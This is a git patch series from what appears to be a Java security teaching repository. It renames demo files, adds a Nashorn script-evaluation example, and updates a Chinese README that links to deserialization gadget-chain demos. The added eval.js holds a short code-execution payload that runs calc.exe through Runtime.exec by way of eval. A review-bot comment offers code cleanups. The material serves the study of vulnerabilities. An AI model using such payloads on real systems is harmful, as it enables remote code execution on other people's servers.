jdk8/src/main/java/com/govuln/deserialization/JDK7u21.java diff --git a/general/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java b/jdk8/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java rename to jdk8/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java 
diff --git a/general/src/main/java/com/govuln/deserialization/URLDNS.java b/jdk8/src/main/java/com/govuln/deserialization/URLDNS.java
similarity index 100%
rename from general/src/main/java/com/govuln/deserialization/URLDNS.java
rename to jdk8/src/main/java/com/govuln/deserialization/URLDNS.java
diff --git a/jdk8/src/main/java/com/govuln/js/Eval.java b/jdk8/src/main/java/com/govuln/js/Eval.java
new file mode 100644
index 0000000..6c11506
--- /dev/null
+++ b/jdk8/src/main/java/com/govuln/js/Eval.java
@@ -0,0 +1,20 @@
+package com.govuln.js;
+
+import javax.script.ScriptEngine;
+import javax.script.ScriptEngineManager;
+import java.io.FileReader;
+
+import jdk.nashorn.api.scripting.NashornException;
+import jdk.nashorn.api.scripting.NashornScriptEngine;
+import jdk.nashorn.api.scripting.NashornScriptEngineFactory;
+
+import java.io.InputStream;
+import java.lang.Exception;
+
+public class Eval {
+ public static void main(String[] args) throws Exception {
+ ScriptEngineManager manager = new ScriptEngineManager();
+ ScriptEngine engine = manager.getEngineByName("JavaScript");
+ engine.eval(new FileReader("src/main/resources/eval.js"));
+ }
+}
diff --git a/general/src/main/java/com/govuln/serialization/Converter.java b/jdk8/src/main/java/com/govuln/serialization/Converter.java
similarity index 100%
rename from general/src/main/java/com/govuln/serialization/Converter.java
rename to jdk8/src/main/java/com/govuln/serialization/Converter.java
diff --git a/general/src/main/java/com/govuln/serialization/UserSerialization.java b/jdk8/src/main/java/com/govuln/serialization/UserSerialization.java
similarity index 100%
rename from general/src/main/java/com/govuln/serialization/UserSerialization.java
rename to jdk8/src/main/java/com/govuln/serialization/UserSerialization.java
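Review bot: `new FileReader("src/main/resources/eval.js")` in `Eval.main` is never closed, decodes with the platform default charset, and resolves relative to the working directory, so the example only runs when launched from the module root. Wrap it as `try (FileReader in = new FileReader("src/main/resources/eval.js")) { engine.eval(in); }`, or since the script lives under resources, read it through `Eval.class.getResourceAsStream("/eval.js")` with an explicit charset. The three `jdk.nashorn.api.scripting` imports, `java.io.InputStream` and `java.lang.Exception` are unused (`java.lang` is imported implicitly) and should be removed.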
diff --git a/general/src/main/java/com/govuln/serialization/model/User.java b/jdk8/src/main/java/com/govuln/serialization/model/User.java similarity index 100% rename from general/src/main/java/com/govuln/serialization/model/User.java rename to jdk8/src/main/java/com/govuln/serialization/model/User.java diff --git a/general/src/main/java/com/govuln/xxe/DocumentBuilderExample.java b/jdk8/src/main/java/com/govuln/xxe/DocumentBuilderExample.java similarity index 100% rename from general/src/main/java/com/govuln/xxe/DocumentBuilderExample.java rename to jdk8/src/main/java/com/govuln/xxe/DocumentBuilderExample.java diff --git a/general/src/main/java/com/govuln/xxe/SAXParserExample.java b/jdk8/src/main/java/com/govuln/xxe/SAXParserExample.java similarity index 100% rename from general/src/main/java/com/govuln/xxe/SAXParserExample.java rename to jdk8/src/main/java/com/govuln/xxe/SAXParserExample.java diff --git a/general/src/main/java/com/govuln/xxe/XMLReaderExample.java b/jdk8/src/main/java/com/govuln/xxe/XMLReaderExample.java similarity index 100% rename from general/src/main/java/com/govuln/xxe/XMLReaderExample.java rename to jdk8/src/main/java/com/govuln/xxe/XMLReaderExample.java diff --git a/general/src/main/java/com/govuln/xxe/XMLStreamExample.java b/jdk8/src/main/java/com/govuln/xxe/XMLStreamExample.java similarity index 100% rename from general/src/main/java/com/govuln/xxe/XMLStreamExample.java rename to jdk8/src/main/java/com/govuln/xxe/XMLStreamExample.java diff --git a/general/src/main/java/com/govuln/xxe/XPathExpressionExample.java b/jdk8/src/main/java/com/govuln/xxe/XPathExpressionExample.java similarity index 100% rename from general/src/main/java/com/govuln/xxe/XPathExpressionExample.java rename to jdk8/src/main/java/com/govuln/xxe/XPathExpressionExample.java 
diff --git a/general/src/main/java/evil/EvilTemplatesImpl.java b/jdk8/src/main/java/evil/EvilTemplatesImpl.java similarity index 100% rename from general/src/main/java/evil/EvilTemplatesImpl.java rename to jdk8/src/main/java/evil/EvilTemplatesImpl.java diff --git a/general/src/main/java/evil/Hello.java b/jdk8/src/main/java/evil/Hello.java similarity index 100% rename from general/src/main/java/evil/Hello.java rename to jdk8/src/main/java/evil/Hello.java diff --git a/jdk8/src/main/resources/eval.js b/jdk8/src/main/resources/eval.js new file mode 100644 index 0000000..f80f6b6 --- /dev/null +++ b/jdk8/src/main/resources/eval.js @@ -0,0 +1,4 @@ +var a = new java.beans.Customizer { + setObject: eval +} +a.object = "java.lang.Runtime.getRuntime50円51円.exec50円'calc.exe'51円"; \ No newline at end of file From 9573c899d8a9b7328addef596c85aefedcd722cb Mon Sep 17 00:00:00 2001 From: phith0n Date: Wed, 9 Apr 2025 20:02:05 +0800 Subject: [PATCH 10/10] rename folder name --- README.md | 26 +++++++++++++------------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/README.md b/README.md index d6a7031..870ec80 100644 --- a/README.md +++ b/README.md 
@@ -29,22 +29,22 @@ 字节码: -- 远程字节码加载Demo:[HelloClassLoader](general/src/main/java/com/govuln/bytes/HelloClassLoader.java) -- 系统默认defineClass加载字节码Demo:[HelloDefineClass](general/src/main/java/com/govuln/bytes/HelloDefineClass.java) -- 使用TemplatesImpl加载字节码Demo:[HelloTemplatesImpl](general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java) -- 使用BCEL加载字节码Demo:[HelloBCEL](general/src/main/java/com/govuln/bytes/HelloBCEL.java) +- 远程字节码加载Demo:[HelloClassLoader](jdk8/src/main/java/com/govuln/bytes/HelloClassLoader.java) +- 系统默认defineClass加载字节码Demo:[HelloDefineClass](jdk8/src/main/java/com/govuln/bytes/HelloDefineClass.java) +- 使用TemplatesImpl加载字节码Demo:[HelloTemplatesImpl](jdk8/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java) +- 使用BCEL加载字节码Demo:[HelloBCEL](jdk8/src/main/java/com/govuln/bytes/HelloBCEL.java) 反序列化: -- 最简单的Transformer Demo:[CommonsCollectionsIntro.java](general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java) -- 我简化的[CommonsCollections6](general/src/main/java/com/govuln/deserialization/CommonsCollections6.java),更方便大家理解 -- 利用TemplatesImpl构造的Transformer Demo:[CommonsCollectionsIntro2.java](general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java) -- 无InvokerTransformer的Transformer Demo:[CommonsCollectionsIntro3.java](general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java) -- 我简化的[CommonsCollections3](general/src/main/java/com/govuln/deserialization/CommonsCollections3.java) -- CommonsCollections6一次执行多个命令:[CommonsCollections6Multiple](general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java) -- 支持commons-collections4.0版本的CommonsCollections6利用链:[CommonsCollections6For4](general/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java) -- 我简化的CommonsBeanutils1利用链:[CommonsBeanutils1](general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java) -- 简化版Java原生利用链 [JDK7u21](general/src/main/java/com/govuln/deserialization/JDK7u21.java) +- 
最简单的Transformer Demo:[CommonsCollectionsIntro.java](jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java) +- 我简化的[CommonsCollections6](jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6.java),更方便大家理解 +- 利用TemplatesImpl构造的Transformer Demo:[CommonsCollectionsIntro2.java](jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java) +- 无InvokerTransformer的Transformer Demo:[CommonsCollectionsIntro3.java](jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java) +- 我简化的[CommonsCollections3](jdk8/src/main/java/com/govuln/deserialization/CommonsCollections3.java) +- CommonsCollections6一次执行多个命令:[CommonsCollections6Multiple](jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java) +- 支持commons-collections4.0版本的CommonsCollections6利用链:[CommonsCollections6For4](jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java) +- 我简化的CommonsBeanutils1利用链:[CommonsBeanutils1](jdk8/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java) +- 简化版Java原生利用链 [JDK7u21](jdk8/src/main/java/com/govuln/deserialization/JDK7u21.java) Shiro反序列化:
